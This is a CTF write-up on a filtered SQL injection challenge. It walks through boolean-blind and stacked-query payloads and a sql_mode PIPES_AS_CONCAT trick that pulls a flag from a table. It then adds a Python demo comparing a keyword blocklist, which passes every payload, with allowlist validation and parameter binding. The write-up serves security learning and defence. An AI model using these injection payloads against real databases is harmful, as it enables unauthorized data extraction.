and, or and && are filtered, but || is usable: 0|| length(database())>2 shows the database name has length 3, so boolean-based blind injection could be attempted.
sleep is filtered, so time-based blind injection is out.
union is filtered, so union-based injection is out.
; is not filtered, so try stacked queries.
1;select database()# --> database(): ctf
1;select group_concat(table_name) from information_schema.tables where table_schema=database()#
information_schema and from are filtered.
1;show tables# --> table: Flag
Backend SQL statement: select $_POST['query'] || flag from 'Flag' (no way to guess this -_-)
exp: *,1 --> select *,1 || flag from 'Flag' --> select *,1 from 'Flag' (with the default sql_mode, || is logical OR, so 1 || flag is just 1 and the * returns the flag column)
Official writeup: 1;set sql_mode=PIPES_AS_CONCAT;select 1 (with PIPES_AS_CONCAT, || becomes string concatenation, so 1 || flag returns the flag text)
On sql_mode:
https://blog.csdn.net/lky_for_lucky/article/details/110222051?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168766799816800180668703%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168766799816800180668703&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-110222051-null-null.142^v88^insert_down28v1,239^v2^insert_chatgpt&utm_term=sql_mode&spm=1018.2226.3001.4187
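An added defender-side example (not from the writeup or the challenge): the deny-list reconstructed from the notes above lets every payload in this writeup through, whereas positive validation plus a bound parameter gives the input no way to become SQL text. The Flag table contents and the numeric-id allow-list are assumptions made for the demo.

```python
import re
import sqlite3

# The challenge's filter as the writeup describes it: and / or / && / sleep / union /
# information_schema / from are blocked, while "||" and ";" pass untouched.
BLOCKLIST = re.compile(r"\b(and|or|sleep|union|information_schema|from)\b|&&", re.IGNORECASE)

# Positive validation (an assumption for this example): the endpoint only ever
# needs a short numeric id, so that is all it accepts.
ALLOWLIST = re.compile(r"[0-9]{1,10}")

# The writeup's own payloads, collected here as constructed test input.
PAYLOADS = [
    "0|| length(database())>2",
    "1;select database()#",
    "1;show tables#",
    "*,1",
    "1;set sql_mode=PIPES_AS_CONCAT;select 1",
]

def blocklist_allows(user_input: str) -> bool:
    """Deny-list check: True when no blocked token is present (the weak defence)."""
    return BLOCKLIST.search(user_input) is None

def allowlist_allows(user_input: str) -> bool:
    """Allow-list check: True only when the whole input matches the expected shape."""
    return ALLOWLIST.fullmatch(user_input) is not None

def open_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge's Flag table (sample values)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Flag (id INTEGER, flag TEXT)")
    conn.execute("INSERT INTO Flag VALUES (1, 'flag{sample}')")
    return conn

def lookup(conn: sqlite3.Connection, user_input: str):
    """Hardened lookup: validate first, then bind the value as a parameter so it can
    never become SQL text (no column list, no stacked statement, no sql_mode change).
    Returns the matching (id,) row or None; raises ValueError on malformed input."""
    if not allowlist_allows(user_input):
        raise ValueError("input does not match the expected shape")
    return conn.execute("SELECT id FROM Flag WHERE id = ?", (int(user_input),)).fetchone()

def payloads_passing(check) -> list:
    """Which of the writeup's payloads a given check lets through."""
    return [p for p in PAYLOADS if check(p)]
```

Running payloads_passing(blocklist_allows) returns all five payloads; payloads_passing(allowlist_allows) returns an empty list.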